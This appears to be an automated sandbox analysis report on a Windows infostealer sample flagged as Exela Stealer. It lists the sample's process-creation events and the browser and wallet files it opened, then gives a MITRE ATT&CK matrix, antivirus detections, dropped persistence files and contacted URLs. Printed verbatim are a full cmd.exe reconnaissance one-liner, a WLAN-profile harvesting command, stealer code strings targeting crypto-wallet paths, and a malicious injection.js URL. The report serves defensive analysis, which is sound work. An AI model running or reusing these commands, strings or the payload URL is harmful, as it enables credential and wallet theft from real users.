Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Stealing of Sensitive Information

Yara detected Exela Stealer

Source: Yara match	File source: 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9afaXJv52z.exe PID: 5828, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "Electrum": os.path.join(self.RoamingAppData, "Electrum", "wallets"),
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "Jaxx": os.path.join(self.RoamingAppData, "com.liberty.jaxx", "IndexedDB", "file__0.indexeddb.leveldb"),
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "Exodus": "aholpfdialjgjfhomihkjbmgjidlcdno",
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "Ethereum": os.path.join(self.RoamingAppData, "Ethereum", "keystore"),
Source: 9afaXJv52z.exe, 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: "Ethereum": os.path.join(self.RoamingAppData, "Ethereum", "keystore"),

Gathers network related connection and port information

Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "echo ####System Info#### & systeminfo & echo ####System Version#### & ver & echo ####Host Name#### & hostname & echo ####Environment Variable#### & set & echo ####Logical Disk#### & wmic logicaldisk get caption,description,providername & echo ####User Info#### & net user & echo ####Online User#### & query user & echo ####Local Group#### & net localgroup & echo ####Administrators Info#### & net localgroup administrators & echo ####Guest User Info#### & net user guest & echo ####Administrator User Info#### & net user administrator & echo ####Startup Info#### & wmic startup get caption,command & echo ####Tasklist#### & tasklist /svc & echo ####Ipconfig#### & ipconfig/all & echo ####Hosts#### & type C:\WINDOWS\System32\drivers\etc\hosts & echo ####Route Table#### & route print & echo ####Arp Info#### & arp -a & echo ####Netstat#### & netstat -ano & echo ####Service Info#### & sc query type= service state= all & echo ####Firewallinfo#### & netsh firewall show state & netsh firewall show config"			Jump to behavior

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\Desktop\9afaXJv52z.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profiles"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fmgjjmmmlfnkbppncabfkddbjimcfncm	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\AvailabilityDB	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Temp	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync App Settings	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_kefjledonklijopmnomlcbpllchaibag	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker\EventDB	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalDB	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite-shm	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\places.sqlite-wal	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf	Jump to behavior
Source: C:\Users\user\Desktop\9afaXJv52z.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior

Source: C:\Users\user\Desktop\9afaXJv52z.exe

File read: C:\Users\user\AppData\Local\Temp\19882742-CC56-1A59-9779-FB8CBFA1E29D\Browsers\Cookies.txt

Jump to behavior

Source: Yara match	File source: 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9afaXJv52z.exe PID: 5828, type: MEMORYSTR

Remote Access Functionality

Yara detected Exela Stealer

Source: Yara match	File source: 00000002.00000003.1534496021.0000020DAFE8D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1538000317.0000020DAFE8E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1538128660.0000020DAFC62000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 9afaXJv52z.exe PID: 5828, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	231 Windows Management Instrumentation	11 DLL Side-Loading	11 DLL Side-Loading	2 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Abuse Accessibility Features	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	1 Native API	12 Registry Run Keys / Startup Folder	11 Process Injection	1 Deobfuscate/Decode Files or Information	1 Credentials In Files	1 System Network Connections Discovery	Remote Desktop Protocol	21 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	11 Command and Scripting Interpreter	Logon Script (Windows)	12 Registry Run Keys / Startup Folder	21 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	4 Non-Application Layer Protocol			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	Cron	Login Hook	Login Hook	11 Software Packing	NTDS	55 System Information Discovery	Distributed Component Object Model	1 Clipboard Data	Traffic Duplication	5 Application Layer Protocol			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	451 Security Software Discovery	SSH	Keylogging	Scheduled Transfer	Fallback Channels			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 DLL Side-Loading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Data Transfer Size Limits	Multiband Communication			Service Stop	Botnet	Domain Properties
External Remote Services	Systemd Timers	Startup Items	Startup Items	11 Masquerading	DCSync	151 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over C2 Channel	Commonly Used Port			Inhibit System Recovery	Web Services	DNS
Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	151 Virtualization/Sandbox Evasion	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Exfiltration Over Alternative Protocol	Application Layer Protocol			Defacement	Serverless	Network Trust Dependencies
Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	11 Process Injection	/etc/passwd and /etc/shadow	1 Remote System Discovery	Direct Cloud VM Connections	Data Staged	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Web Protocols			Internal Defacement	Malvertising	Network Topology
Supply Chain Compromise	PowerShell	Cron	Cron	Dynamic API Resolution	Network Sniffing	1 System Network Configuration Discovery	Shared Webroot	Local Data Staging	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	File Transfer Protocols			External Defacement	Compromise Infrastructure	IP Addresses

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
9afaXJv52z.exe	53%	ReversingLabs	Win64.Trojan.Zusy
9afaXJv52z.exe	65%	Virustotal		Browse
9afaXJv52z.exe	100%	Avira	TR/Kryptik.tobsf

Dropped Files

Source	Detection	Scanner	Label	Link
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe	100%	Avira	TR/Kryptik.tobsf
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe	100%	Avira	TR/Kryptik.tobsf
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe	53%	ReversingLabs	Win64.Trojan.Zusy
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exe	65%	Virustotal		Browse
C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe	53%	ReversingLabs	Win64.Trojan.Zusy
C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exe	65%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI67202\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\VCRUNTIME140.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI67202\_asyncio.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_asyncio.pyd	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI67202\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_bz2.pyd	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI67202\_cffi_backend.cp311-win_amd64.pyd	3%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_cffi_backend.cp311-win_amd64.pyd	3%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI67202\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_ctypes.pyd	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI67202\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_decimal.pyd	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI67202\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_hashlib.pyd	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI67202\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_lzma.pyd	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI67202\_multiprocessing.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_multiprocessing.pyd	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI67202\_overlapped.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_overlapped.pyd	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI67202\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_queue.pyd	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI67202\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_socket.pyd	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI67202\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_sqlite3.pyd	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI67202\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_ssl.pyd	1%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\_MEI67202\_uuid.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI67202\_uuid.pyd	1%	Virustotal		Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
discord.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.cl.cam.ac.uk/~mgk25/iso-time.html	0%	URL Reputation	safe
https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&ba	0%	Avira URL Cloud	safe
https://tiktok.com/	0%	Avira URL Cloud	safe
https://webcast.tiktok.com/webcast/wallet_api/diamond_buy/permission/?aid=1988&app_language=de-DE&ap	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/python-attrs/attrs/main/docs/_static/attrs_logo.svg	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/python-attrs/attrs/main/.github/sponsors/FilePreviews.svg	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/python-attrs/attrs/main/.github/sponsors/Tidelift.svg	0%	Avira URL Cloud	safe
https://www.tiktok.com/passport/web/account/info/?aid=1459&app_language=de-DE&app_name=tiktok_web&ba	0%	Virustotal		Browse
https://raw.githubusercontent.com/justforExela/injection/main/injection.js	100%	Avira URL Cloud	malware
https://webcast.tiktok.com/webcast/wallet_api/diamond_buy/permission/?aid=1988&app_language=de-DE&ap	0%	Virustotal		Browse
https://tiktok.com/	0%	Virustotal		Browse
https://discord.com/api/v8/users/	0%	Avira URL Cloud	safe
http://crl.ver)	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/python-attrs/attrs/main/docs/_static/attrs_logo.svg	1%	Virustotal		Browse
